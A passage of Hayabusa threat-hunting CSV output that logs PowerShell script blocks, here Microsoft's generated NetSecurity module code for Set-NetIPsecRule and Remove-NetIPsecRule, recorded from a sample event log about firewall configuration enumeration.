'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShe,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 